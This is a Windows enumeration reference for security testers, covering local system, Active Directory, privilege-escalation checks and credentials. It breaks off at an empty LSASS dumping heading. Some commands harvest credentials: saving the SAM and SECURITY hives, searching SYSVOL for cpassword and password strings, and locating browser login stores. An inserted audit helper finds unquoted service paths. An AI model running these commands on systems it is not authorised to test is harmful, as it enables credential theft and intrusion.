Complete Windows Enumeration Manual

Comprehensive reference guide with all Windows enumeration techniques for security professionals. Contains 500+ commands covering local system, Active Directory, privilege escalation, and more.


Local System Enumeration

Complete local system enumeration covering all Windows components, services, configurations, and artifacts.

Complete System Information
# Complete OS and hardware enumeration
## Basic system info
systeminfo
systeminfo /fo csv
hostname
ver
wmic os get Caption,Version,OSArchitecture,BuildNumber,CSDVersion,SerialNumber,InstallDate,LastBootUpTime,Locale,CountryCode,OSLanguage /value
wmic computersystem get Name,Domain,Manufacturer,Model,TotalPhysicalMemory,SystemType,UserName,Roles /value
## Detailed hardware info
wmic cpu get Name,Description,DeviceID,NumberOfCores,NumberOfLogicalProcessors,MaxClockSpeed,CurrentClockSpeed,SocketDesignation,Manufacturer /value
wmic memorychip get BankLabel,Capacity,DataWidth,Description,DeviceLocator,Manufacturer,PartNumber,SerialNumber,Speed /value
wmic diskdrive get Model,InterfaceType,MediaType,Name,Partitions,Size,SerialNumber /value
wmic logicaldisk get DeviceID,DriveType,Size,FreeSpace,FileSystem,VolumeName,VolumeSerialNumber /value
wmic volume get Label,Capacity,FreeSpace,FileSystem,DriveLetter /value
## BIOS and firmware
wmic bios get Manufacturer,Name,SerialNumber,SMBIOSBIOSVersion,Version,ReleaseDate /value
wmic baseboard get Manufacturer,Product,SerialNumber,Version /value
wmic computersystem get OEMStringArray
## Time and locale
systeminfo | findstr /C:"Time Zone"
wmic timezone get Caption,StandardName
reg query "HKLM\SYSTEM\CurrentControlSet\Control\TimeZoneInformation"
systeminfo | findstr /C:"System Locale" /C:"Input Locale"
Complete User & Group Enumeration
# Complete user and group enumeration
## Current user context
whoami
whoami /priv
whoami /groups
whoami /all
echo %USERNAME%
echo %USERDOMAIN%
echo %LOGONSERVER%
qwinsta
query session
query user
klist sessions
## Local user accounts
net user
net user /domain
net user <username>
net user <username> /domain
wmic useraccount get Name,FullName,Disabled,Status,Lockout,SID /value
wmic useraccount where "LocalAccount=True" get Name,Disabled,Status,Lockout,SID
## Local groups
net localgroup
net localgroup Administrators
net localgroup "Remote Desktop Users"
net localgroup "Backup Operators"
net localgroup "Power Users"
wmic group get Name,SID
## Account policies
net accounts
net accounts /domain
net config workstation
net config server
## Logged on users
qwinsta
query session
query user
net session
klist sessions
klist tgt
Complete Network Enumeration
# Complete network enumeration
## Network interfaces
ipconfig /all
ipconfig /displaydns
ipconfig /displaydns | findstr /C:"Record Name"
netsh interface ip show config
netsh interface ipv4 show addresses
netsh interface ipv4 show subinterfaces
netsh interface ipv4 show interfaces
netsh interface ipv6 show addresses
netsh interface ipv6 show interfaces
wmic nicconfig get IPAddress,MACAddress,DefaultIPGateway,DHCPEnabled,DNSServerSearchOrder
## Routing tables
route print
route print -4
route print -6
netsh interface ipv4 show route
netsh interface ipv6 show route
arp -a
arp -a -v
## DNS information
nslookup
nslookup -type=soa <domain>
nslookup -type=mx <domain>
nslookup -type=ns <domain>
nslookup -type=txt <domain>
type %WINDIR%\System32\drivers\etc\hosts
type %WINDIR%\System32\drivers\etc\networks
type %WINDIR%\System32\drivers\etc\protocol
type %WINDIR%\System32\drivers\etc\services
## Active connections
netstat -ano
netstat -ano -p tcp
netstat -ano -p udp
netstat -ano -f
netstat -abno
netstat -bano
netstat -r
netstat -e
netstat -s
## Firewall configuration
netsh firewall show config
netsh advfirewall firewall show rule name=all
netsh advfirewall show allprofiles
netsh advfirewall show currentprofile
netsh advfirewall show global
Complete Process & Service Enumeration
# Complete process and service enumeration
## Process enumeration
tasklist
tasklist /SVC
tasklist /V
tasklist /M
tasklist /FO csv
wmic process get Name,ProcessId,ParentProcessId,CommandLine,ExecutablePath,WorkingSetSize,ThreadCount,HandleCount /value
wmic process where "Name='lsass.exe'" get CommandLine,ProcessId,ParentProcessId
wmic process where "Name='explorer.exe'" get CommandLine,ProcessId,ParentProcessId
Get-Process | Select-Object Name,Id,CPU,WorkingSet,Path,StartTime,Company,ProductVersion
Get-Process | Where-Object {$_.Path -like "*temp*"} | Select-Object Name,Id,Path
## Service enumeration
sc query
sc queryex
sc qc "<service_name>"
sc qfailure "<service_name>"
sc enumdepend "<service_name>"
net start
wmic service get Name,DisplayName,PathName,StartMode,State,StartName,ProcessId /value
wmic service where "StartMode='Auto'" get Name,DisplayName,PathName
wmic service where "State='Running'" get Name,DisplayName,PathName
Get-Service | Select-Object Name,DisplayName,Status,StartType
Get-WmiObject Win32_Service | Select-Object Name,State,PathName,StartMode
## Driver enumeration
driverquery
driverquery /v
driverquery /fo csv
driverquery /si
fltmc
fltmc instances
wmic sysdriver get Name,DisplayName,PathName,State,StartMode /value
Complete Registry Enumeration
# Complete registry enumeration
## Startup locations
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce"
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices"
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices"
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg query "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"
## Environment variables in registry
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment"
reg query "HKCU\Environment"
## AppInit DLLs and KnownDLLs
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs"
## LSA and security configuration
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Lsa"
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0"
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos"
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Lsa\SSP"
## Service configurations
reg query "HKLM\SYSTEM\CurrentControlSet\Services"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\<service_name>"
## SAM and security hives
reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save
reg save HKLM\SECURITY security.save
## PowerShell settings
reg query "HKLM\Software\Policies\Microsoft\Windows\PowerShell"
reg query "HKCU\Software\Policies\Microsoft\Windows\PowerShell"
## UAC settings
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System"
Complete File System Enumeration
# Complete file system enumeration
## Sensitive file locations
dir /a C:\Windows\System32\config\SAM
dir /a C:\Windows\repair\SAM
dir /a C:\Windows\System32\drivers\etc\
type C:\Windows\System32\drivers\etc\hosts
type C:\Windows\System32\drivers\etc\networks
type C:\Windows\System32\drivers\etc\protocol
type C:\Windows\System32\drivers\etc\services
## Program directories
dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
dir /a "C:\ProgramData"
dir /a "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
## User directories
dir /a "C:\Users"
dir /a "C:\Users\Public"
dir /a "C:\Users\<username>\Desktop"
dir /a "C:\Users\<username>\Documents"
dir /a "C:\Users\<username>\Downloads"
dir /a "C:\Users\<username>\AppData"
dir /a "C:\Users\<username>\AppData\Roaming"
dir /a "C:\Users\<username>\AppData\Local"
dir /a "C:\Users\<username>\AppData\LocalLow"
## Configuration files
dir /s /b *.config 2>nul
dir /s /b web.config 2>nul
dir /s /b *.xml 2>nul
dir /s /b *.ini 2>nul
dir /s /b *.conf 2>nul
dir /s /b *.txt 2>nul | findstr /i "pass"
dir /s /b *.log 2>nul
## Recent files and artifacts
dir /a "C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Recent"
dir /a "C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations"
dir /a "C:\Windows\Prefetch"
dir /a "$RECYCLE.BIN" /s 2>nul
## Log files
dir /a "C:\Windows\System32\winevt\Logs"
dir /a "C:\Windows\Logs"
dir /a "C:\inetpub\logs" 2>nul
Complete Scheduled Tasks Enumeration
# Complete scheduled tasks enumeration
schtasks /query /fo LIST /v
schtasks /query /fo TABLE
schtasks /query /fo CSV
schtasks /query /tn "<task_name>" /fo LIST /v
schtasks /query /tn "\Microsoft\Windows\*" /fo LIST
schtasks /query /tn "*\*" /fo LIST
# AT jobs (legacy)
at
# PowerShell scheduled tasks
Get-ScheduledTask | Select-Object TaskName,TaskPath,State
Get-ScheduledTask | Where-Object {$_.State -eq "Ready"} | Select-Object TaskName,TaskPath
Get-ScheduledTask | Where-Object {$_.TaskName -like "*update*"} | Select-Object TaskName,TaskPath,State
# WMI scheduled tasks
wmic job get Caption,Command,Status,StartTime
# XML scheduled tasks
dir /s C:\Windows\System32\Tasks
dir /s C:\Windows\Tasks
Complete Installed Applications Enumeration
# Complete installed applications enumeration
## WMI product enumeration
wmic product get Name,Version,Vendor,InstallDate
wmic product where "Vendor='Microsoft Corporation'" get Name,Version
wmic product where "Name like '%Adobe%'" get Name,Version
wmic product where "Name like '%Java%'" get Name,Version
wmic product where "Name like '%Office%'" get Name,Version
## Registry installed programs
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall"
reg query "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall"
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall"
## File system programs
dir "C:\Program Files" /b
dir "C:\Program Files (x86)" /b
## Windows features
dism /online /Get-Features
dism /online /Get-Features | findstr /i "Enabled"
Get-WindowsOptionalFeature -Online | Where-Object {$_.State -eq "Enabled"} | Select-Object FeatureName
## PowerShell installed modules
Get-Module -ListAvailable
Get-InstalledModule
Get-Package
Complete Environment Variables Enumeration
# Complete environment variables enumeration
set
echo %PATH%
echo %PATHEXT%
echo %PROMPT%
echo %TEMP%
echo %TMP%
echo %WINDIR%
echo %SYSTEMROOT%
echo %PROGRAMFILES%
echo %PROGRAMFILES(x86)%
echo %APPDATA%
echo %LOCALAPPDATA%
echo %USERPROFILE%
echo %HOMEDRIVE%
echo %HOMEPATH%
echo %COMPUTERNAME%
echo %USERNAME%
echo %USERDOMAIN%
echo %LOGONSERVER%
echo %PROCESSOR_ARCHITECTURE%
echo %PROCESSOR_IDENTIFIER%
echo %NUMBER_OF_PROCESSORS%
echo %PROCESSOR_LEVEL%
echo %PROCESSOR_REVISION%
Complete Hotfix & Patch Enumeration
# Complete hotfix and patch enumeration
wmic qfe get Caption,Description,HotFixID,InstalledOn
wmic qfe get Caption,Description,HotFixID,InstalledOn /format:csv
systeminfo | findstr /B /C:"Hotfix(s)"
systeminfo | findstr /C:"KB"
Get-HotFix
Get-HotFix | Sort-Object InstalledOn -Descending
Get-HotFix -Id KB*
# PowerShell update history
Get-WmiObject -Class Win32_QuickFixEngineering | Select-Object HotFixID,Description,InstalledOn
Get-WmiObject -Class Win32_QuickFixEngineering | Where-Object {$_.HotFixID -like "KB*"} | Select-Object HotFixID,Description,InstalledOn
# WSUS settings
reg query "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate"
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate"
Complete Browser Artifacts Enumeration
# Complete browser artifacts enumeration
## Chrome
dir /a "%LocalAppData%\Google\Chrome\User Data\Default\"
dir /a "%LocalAppData%\Google\Chrome\User Data\Default\Login Data"
dir /a "%LocalAppData%\Google\Chrome\User Data\Default\Cookies"
dir /a "%LocalAppData%\Google\Chrome\User Data\Default\History"
dir /a "%LocalAppData%\Google\Chrome\User Data\Default\Bookmarks"
dir /a "%LocalAppData%\Google\Chrome\User Data\Local State"
## Firefox
dir /a "%AppData%\Mozilla\Firefox\Profiles\"
dir /s "%AppData%\Mozilla\Firefox\Profiles\*.sqlite"
dir /s "%AppData%\Mozilla\Firefox\Profiles\*.json"
dir /s "%AppData%\Mozilla\Firefox\Profiles\*.db"
## Edge/IE
dir /a "%LocalAppData%\Microsoft\Edge\User Data\Default\"
dir /a "%AppData%\Microsoft\Windows\Cookies"
dir /a "%AppData%\Microsoft\Internet Explorer\UserData"
dir /a "%LocalAppData%\Microsoft\Internet Explorer\Recovery"
## Saved credentials
cmdkey /list
rundll32.exe keymgr.dll,KRShowKeyMgr
Complete PowerShell Enumeration
# Complete PowerShell enumeration
## PowerShell history
type (Get-PSReadlineOption).HistorySavePath
Get-Content (Get-PSReadlineOption).HistorySavePath
dir /a "C:\Users\<username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\"
dir /a "C:\Users\<username>\Documents\WindowsPowerShell\"
## PowerShell transcripts
dir /a "C:\Users\<username>\Documents" *.txt | findstr /i "powershell_transcript"
dir /a "C:\Windows\System32\winevt\Logs" | findstr /i "powershell"
## PowerShell configuration
Get-ExecutionPolicy
Get-ExecutionPolicy -List
$ExecutionContext.SessionState.LanguageMode
Get-PSSessionConfiguration
Get-PSReadlineOption
## PowerShell modules
Get-Module
Get-Module -ListAvailable
Get-InstalledModule
Test-ModuleManifest <module>
## PowerShell profiles
$PROFILE
$PROFILE.AllUsersAllHosts
$PROFILE.AllUsersCurrentHost
$PROFILE.CurrentUserAllHosts
$PROFILE.CurrentUserCurrentHost
Test-Path $PROFILE
Get-Content $PROFILE -ErrorAction SilentlyContinue
Complete WMI Enumeration
# Complete WMI enumeration
## WMI namespaces
wmic /namespace:\\root path __namespace get name
Get-WmiObject -Namespace root -Class __Namespace | Select-Object Name
Get-CimInstance -Namespace root -ClassName __Namespace | Select-Object Name
## WMI event subscriptions
Get-WmiObject -Namespace root\Subscription -Class __EventFilter
Get-WmiObject -Namespace root\Subscription -Class __FilterToConsumerBinding
Get-WmiObject -Namespace root\Subscription -Class __EventConsumer
## WMI timer instructions
Get-WmiObject -Namespace root\Subscription -Class __AbsoluteTimerInstruction
Get-WmiObject -Namespace root\Subscription -Class __IntervalTimerInstruction
## WMI classes
wmic class list brief
wmic /namespace:\\root\cimv2 path Win32_Process get /value
wmic /namespace:\\root\cimv2 path Win32_Service get /value
wmic /namespace:\\root\cimv2 path Win32_ComputerSystem get /value
## WMI providers
wmic /namespace:\\root\cimv2 path __Win32Provider get /value
Complete COM/DCOM Enumeration
# Complete COM/DCOM enumeration
Get-CimInstance Win32_COMSetting
Get-ChildItem HKLM:\Software\Classes -ErrorAction SilentlyContinue | Where-Object {$_.PSChildName -match '^\w+\.\w+$'}
# HKCR: is not a PowerShell drive by default; map it first
New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT -ErrorAction SilentlyContinue | Out-Null
Get-ChildItem HKCR:\ -ErrorAction SilentlyContinue | Where-Object {$_.PSChildName -match '^\w+\.\w+$'}
# COM class enumeration
reg query "HKCR\CLSID"
reg query "HKLM\Software\Classes\CLSID"
# DCOM applications
reg query "HKCR\AppID"
reg query "HKLM\Software\Classes\AppID"
# CLSID extraction
reg query "HKCR" /f "CLSID" /k
Complete Certificate Store Enumeration
# Complete certificate store enumeration
certutil -store -user My
certutil -store -user -v My
certutil -store My
certutil -store -v My
certutil -store CA
certutil -store Root
certutil -store -enterprise
certutil -store -groupPolicy
# PowerShell certificate enumeration
Get-ChildItem Cert:\LocalMachine\My
Get-ChildItem Cert:\CurrentUser\My
Get-ChildItem Cert:\LocalMachine\Root
Get-ChildItem Cert:\LocalMachine\CA
Get-ChildItem Cert:\LocalMachine -Recurse
Get-ChildItem Cert:\CurrentUser -Recurse
# Certificate details
certutil -dump -v
certutil -viewstore "My"
certutil -viewdelstore "My"
# Certificate private keys
dir /a C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys
dir /a C:\Users\<username>\AppData\Roaming\Microsoft\Crypto\RSA
Complete Windows Event Logs Enumeration
# Complete Windows event logs enumeration
wevtutil el
wevtutil gli <log_name>
wevtutil qe <log_name> /f:text
wevtutil qe Security /f:text /rd:true /c:10
wevtutil qe System /f:text /rd:true /c:10
wevtutil qe Application /f:text /rd:true /c:10
# PowerShell event logs
Get-EventLog -List
Get-WinEvent -ListLog *
Get-WinEvent -LogName Security -MaxEvents 10
Get-WinEvent -LogName System -MaxEvents 10
Get-WinEvent -LogName Application -MaxEvents 10
# Specific interesting logs
Get-WinEvent -ListLog *PowerShell*
Get-WinEvent -ListLog *TerminalServices*
Get-WinEvent -ListLog "*Windows Defender*"
Get-WinEvent -ListLog *Microsoft-Windows-Sysmon*
# RDP logs
Get-WinEvent -LogName "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational" -MaxEvents 10
Get-WinEvent -LogName "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational" -MaxEvents 10
# PowerShell operational logs
Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" -MaxEvents 10
Get-WinEvent -LogName "Windows PowerShell" -MaxEvents 10
Complete RDP/Terminal Services Enumeration
# Complete RDP/Terminal Services enumeration
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber
qwinsta
query session
query user
query termserver
netstat -ano | findstr :3389
# RDP certificates
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SSLCertificateSHA1Hash
certutil -store -v My | findstr /i "rdp"
# Remote Desktop Gateway
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server Gateway"

Domain & Active Directory Enumeration

Comprehensive Active Directory enumeration covering domain controllers, users, groups, computers, trust relationships, group policies, and SYSVOL.

Complete Domain Discovery & Information
# Complete domain discovery
net config workstation
net config server
net view /domain
net view /domain:<domain_name>
nltest /domain_trusts
nltest /dclist:<domain_name>
nltest /dsgetdc:<domain_name>
nltest /dsgetsite
nltest /dsgetsitecov
# Domain controller information
net group "Domain Controllers" /domain
netdom query dc
netdom query dc /domain:<domain_name>
nslookup -type=srv _ldap._tcp.dc._msdcs.<domain_name>
nslookup -type=srv _ldap._tcp.<domain_name>
nslookup -type=srv _kerberos._tcp.dc._msdcs.<domain_name>
# Forest information
netdom query fsmo
netdom query fsmo /domain:<domain_name>
dsquery server -hasfsmo schema
dsquery server -hasfsmo name
dsquery server -hasfsmo infr
dsquery server -hasfsmo pdc
dsquery server -hasfsmo rid
Complete Domain Users & Groups
# Complete domain user enumeration
net user /domain
net user <username> /domain
net group /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain
net group "Schema Admins" /domain
net group "Domain Users" /domain
net group "Domain Computers" /domain
net group "Domain Controllers" /domain
# Builtin operator groups are domain-local, so they are listed with net localgroup rather than net group
net localgroup "Backup Operators" /domain
net localgroup "Account Operators" /domain
net localgroup "Server Operators" /domain
net localgroup "Print Operators" /domain
net localgroup "Replicator" /domain
# Detailed user information
net accounts /domain
net config workstation
dsquery user
dsquery user -name <username>
dsquery user -samid <sam_account_name>
dsget user <user_dn> -samid -sid -desc -email -tel
# Password policy
net accounts /domain
net accounts /domain | findstr /i "lockout"
net accounts /domain | findstr /i "length"
Complete Domain Computers Enumeration
# Complete domain computers enumeration
net group "Domain Computers" /domain
net view /domain:<domain_name>
net view \\<computer_name>
dsquery computer
dsquery computer -name <computer_name>
dsquery computer -samid <computer_account>
dsquery computer -desc <description>
# Computer details
dsget computer <computer_dn> -samid -sid -desc -loc
nltest /server:<computer_name> /query
nltest /server:<computer_name> /sc_query:<domain_name>
# SPN enumeration
setspn -T <domain_name> -Q */*
setspn -T <domain_name> -L <computer_name>
setspn -T <domain_name> -X
Complete Domain Shares Enumeration
# Complete domain shares enumeration
net share
net view
net view \\<computer_name>
net view /domain:<domain_name>
wmic /node:<computer_name> share get Name,Path,Type
wmic /node:<computer_name> share where "Type=0" get Name,Path
# Hidden shares
net share admin$
net share c$
net share ipc$
net share print$
# SMB configuration
reg query "HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v NullSessionShares
reg query "HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v NullSessionPipes
reg query "HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v RestrictNullSessAccess
Complete Trust Relationships Enumeration
# Complete trust relationships enumeration
nltest /domain_trusts
nltest /domain_trusts /all_trusts
nltest /trusted_domains
netdom trust /domain:<domain_name> /query
netdom trust /domain:<domain_name> /query /verbose
# Forest trusts (nltest exposes forest trusts as a filter on /domain_trusts)
nltest /domain_trusts /forest
netdom trust /domain:<domain_name> /query /forest
# Trust direction and type
dsquery * "CN=System,DC=<domain>,DC=<tld>" -filter "(&(objectClass=trustedDomain))" -attr *
Get-ADTrust -Filter *
Get-ADTrust -Identity <domain_name> -Properties *
Complete Group Policy Enumeration
# Complete Group Policy enumeration
gpresult /z
gpresult /h report.html
gpresult /r
gpresult /scope computer /z
gpresult /scope user /z
# Group Policy Objects
gplink
gpupdate /force
Get-GPO -All
Get-GPOReport -All -ReportType HTML -Path report.html
# Group Policy Preferences
dir \\<domain>\SYSVOL\<domain>\Policies\
findstr /S /I cpassword \\<domain>\SYSVOL\<domain>\Policies\*.xml
findstr /S /I cpassword \\<domain>\SYSVOL\<domain>\Policies\*.xml | findstr /B /I /V "<?"
# Specific GPP files
dir \\<domain>\SYSVOL\<domain>\Policies\*\Machine\Preferences\Groups\Groups.xml
dir \\<domain>\SYSVOL\<domain>\Policies\*\User\Preferences\Groups\Groups.xml
dir \\<domain>\SYSVOL\<domain>\Policies\*\Machine\Preferences\Services\Services.xml
dir \\<domain>\SYSVOL\<domain>\Policies\*\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
Complete SYSVOL Enumeration
# Complete SYSVOL enumeration
dir \\<domain>\SYSVOL\
dir \\<domain>\SYSVOL\<domain>\
dir \\<domain>\SYSVOL\<domain>\Policies\
dir \\<domain>\SYSVOL\<domain>\Scripts\
# Login scripts
dir \\<domain>\SYSVOL\<domain>\Scripts\Logon\
dir \\<domain>\SYSVOL\<domain>\Scripts\Logoff\
dir \\<domain>\SYSVOL\<domain>\Scripts\Startup\
dir \\<domain>\SYSVOL\<domain>\Scripts\Shutdown\
# Policy scripts
dir \\<domain>\SYSVOL\<domain>\Policies\*\Machine\Scripts\
dir \\<domain>\SYSVOL\<domain>\Policies\*\User\Scripts\
# Interesting files
findstr /S /I "pass" \\<domain>\SYSVOL\<domain>\*.txt
findstr /S /I "pass" \\<domain>\SYSVOL\<domain>\*.vbs
findstr /S /I "pass" \\<domain>\SYSVOL\<domain>\*.bat
findstr /S /I "pass" \\<domain>\SYSVOL\<domain>\*.ps1

Privilege Escalation Enumeration

Comprehensive privilege escalation vulnerability checks including service permissions, unquoted paths, DLL hijacking, token manipulation, and kernel exploits.

Complete Service Permission Checks
# Complete service permission checks
## Service object permissions (accesschk -c checks the service DACL, not the binary)
accesschk.exe -accepteula -uwcqv "Authenticated Users" *
accesschk.exe -accepteula -uwcqv Users *
accesschk.exe -accepteula -uwcqv "Everyone" *
accesschk.exe -accepteula -uwcqv "NT AUTHORITY\INTERACTIVE" *
## Service configuration
sc qc <service_name>
sc queryex <service_name>
sc qfailure <service_name>
wmic service get Name,DisplayName,PathName,StartMode,StartName
wmic service where "StartName='LocalSystem'" get Name,DisplayName,PathName
## Service DACLs
sc sdshow <service_name>
sc sdshow SCMANAGER
## Service state
sc query state= all
sc query state= inactive
sc query state= all | findstr SERVICE_NAME
Complete Unquoted Service Path Checks
# Complete unquoted service path checks
wmic service get Name,DisplayName,PathName,StartMode | findstr /i /v "C:\Windows\\" | findstr /i /v """
wmic service where "not PathName like '%%.exe%%' and PathName like '% %'" get Name,DisplayName,PathName,StartMode
wmic service where "PathName like '%% %%' and not PathName like '\"%%\"'" get Name,DisplayName,PathName,StartMode
# PowerShell unquoted paths (match on a leading quote only; paths with arguments do not end in a quote)
Get-WmiObject win32_service | Select-Object Name,DisplayName,PathName,StartMode | Where-Object {$_.PathName -notlike '"*' -and $_.PathName -like "* *"}
Get-CimInstance win32_service | Select-Object Name,DisplayName,PathName,StartMode | Where-Object {$_.PathName -notlike '"*' -and $_.PathName -like "* *"}
# Manual checking
sc query | findstr SERVICE_NAME
for /f "tokens=2 delims=:" %i in ('sc query state= all ^| findstr SERVICE_NAME') do @for /f "delims= " %j in ("%i") do @sc qc "%j" | findstr BINARY_PATH_NAME
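The one-liners above only list candidates. The following PowerShell function is an added audit helper, not part of this cheat sheet or any tool it names: it isolates the executable portion of each unquoted ImagePath, reports the parent directories that Windows would consult before reaching the real binary (the directories an administrator needs to keep non-writable), and prints the sc.exe command that quotes the path. It assumes Windows PowerShell 5.1 or later; the function name and the IncludeWindowsDir switch are this example's own.

```powershell
# Added audit helper for unquoted service paths; not from the cheat sheet above.
# Assumes Windows PowerShell 5.1+ and read access to the service configuration.
function Get-UnquotedServicePath {
    [CmdletBinding()]
    param(
        # By default services under C:\Windows are skipped; that tree is system-owned.
        [switch]$IncludeWindowsDir
    )
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $path = $_.PathName
        if (-not $path) { return }
        if ($path.StartsWith('"')) { return }                       # already quoted
        if (-not $IncludeWindowsDir -and $path -match '^[A-Za-z]:\\Windows\\') { return }

        # The executable is everything up to and including the first ".exe";
        # what follows are arguments and does not take part in path resolution.
        $m    = [regex]::Match($path, '(?i)^.*?\.exe')
        $exe  = if ($m.Success) { $m.Value } else { $path }
        $tail = $path.Substring($exe.Length)
        if ($exe -notmatch ' ') { return }                          # no space, no ambiguity

        # Each prefix that ends at a space is a name the loader tries first;
        # collect the parent directory of each so the DACLs can be reviewed.
        $dirs  = @()
        $parts = $exe.Split(' ')
        for ($i = 1; $i -lt $parts.Count; $i++) {
            $candidate = ($parts[0..($i - 1)] -join ' ') + '.exe'
            $dirs += Split-Path -Path $candidate -Parent
        }

        [pscustomobject]@{
            Name        = $_.Name
            StartMode   = $_.StartMode
            RunsAs      = $_.StartName
            PathName    = $path
            Directories = ($dirs | Select-Object -Unique)
            # sc.exe wants the inner quotes escaped, hence the \" pairs
            Remediation = 'sc.exe config "{0}" binPath= "\"{1}\"{2}"' -f $_.Name, $exe, $tail
        }
    }
}

# Usage: review the findings, then run each Remediation line from an elevated prompt
Get-UnquotedServicePath | Format-List
```

Services running as LocalSystem (RunsAs) with auto start and a user-writable directory in the Directories list are the ones to quote first; the Remediation string is printed rather than executed so the change can be reviewed before it is applied.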
Complete AlwaysInstallElevated Checks
# Complete AlwaysInstallElevated checks
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# PowerShell checks
Get-ItemProperty -Path "HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer" -Name "AlwaysInstallElevated" -ErrorAction SilentlyContinue
Get-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer" -Name "AlwaysInstallElevated" -ErrorAction SilentlyContinue
# Windows Installer service
sc query msiserver
sc qc msiserver
Complete Weak Folder Permission Checks
# Complete weak folder permission checks
icacls "C:\Program Files\*" 2>nul | findstr "(F) (M) (W) :\" | findstr /v ":"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F) (M) (W) :\" | findstr /v ":"
icacls "C:\Windows\System32\*" 2>nul | findstr "(F) (M) (W) :\" | findstr /v ":"
# Service binary directories
for /f "tokens=2 delims=:" %i in ('sc query state= all ^| findstr SERVICE_NAME') do @for /f "delims= " %j in ("%i") do @sc qc "%j" | findstr BINARY_PATH_NAME | findstr /i /v "c:\windows"
# Startup directories
icacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
icacls "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
# PowerShell permissions
icacls "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
icacls "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Complete DLL Hijacking Checks
# Complete DLL hijacking checks
## PATH environment variable
echo %PATH%
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v PATH
reg query "HKCU\Environment" /v PATH
## KnownDLLs
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs"
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs" /v *
## AppInit DLLs
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v RequireSignedAppInit_DLLs
## DLL search order
set PATH
wmic environment where "Name='Path'" get *
Complete Token Manipulation Checks
# Complete token manipulation checks
whoami /priv
whoami /groups
whoami /all
# SeImpersonatePrivilege and related privileges
whoami /priv | findstr /i "SeImpersonatePrivilege"
whoami /priv | findstr /i "SeAssignPrimaryTokenPrivilege"
whoami /priv | findstr /i "SeCreateTokenPrivilege"
whoami /priv | findstr /i "SeDebugPrivilege"
whoami /priv | findstr /i "SeTcbPrivilege"
# Token groups
whoami /groups | findstr /i "Mandatory Label"
whoami /groups | findstr /i "High Mandatory Level"
whoami /groups | findstr /i "Medium Mandatory Level"
whoami /groups | findstr /i "Low Mandatory Level"
# PowerShell token checks
[Security.Principal.WindowsPrincipal]::new([Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
[Security.Principal.WindowsIdentity]::GetCurrent().Groups | Where-Object {$_.Value -match "S-1-16-"} | ForEach-Object {$_.Translate([Security.Principal.NTAccount])}

Credential Access Enumeration

Comprehensive credential extraction techniques including LSASS memory dumping, registry credential extraction, DPAPI, browser credentials, and saved passwords.

Complete LSASS Memory Dumping
# Complete LSASS memory dumping
